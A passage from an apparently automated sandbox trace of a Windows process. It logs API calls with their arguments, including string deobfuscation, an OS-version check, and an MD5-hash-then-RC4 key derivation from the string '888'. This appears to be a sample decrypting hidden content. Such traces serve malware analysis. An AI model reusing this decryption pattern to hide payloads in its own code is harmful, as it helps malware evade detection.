lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0105.895] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0105.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.895] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0105.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0105.956] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0105.956] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.956] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.956] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.957] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0105.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0105.957] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.957] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.957] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0105.957] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.957] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0105.957] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0105.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0105.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0105.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7160, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0105.957] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9be890) returned 1 [0105.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.958] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0105.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.958] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0105.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.958] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.958] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0105.958] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.959] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0105.959] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.959] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.959] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0105.959] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.959] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0105.959] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.959] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.959] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.960] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0105.960] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.960] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.960] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0105.960] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.960] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0105.960] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.960] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.960] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.960] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.960] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.960] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.960] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0105.960] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.960] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0105.960] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.961] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9e38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0105.961] CryptCreateHash (in: hProv=0x9be890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0105.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0105.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0105.961] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0105.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0105.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0105.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.961] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.961] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.961] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.961] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.961] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.961] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0105.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9e98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0105.962] CryptHashData (hHash=0x9a3b80, pbData=0x2a71898, dwDataLen=0x3, dwFlags=0x1) returned 1 [0105.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.962] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.962] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.962] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.962] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.962] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.962] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0105.962] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.962] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0105.962] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.962] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.962] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0105.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9ee0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0105.962] CryptDeriveKey (in: hProv=0x9be890, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a48c0) returned 1 [0105.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.962] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.963] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.963] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0105.963] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.963] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0105.963] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0105.963] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71a0, 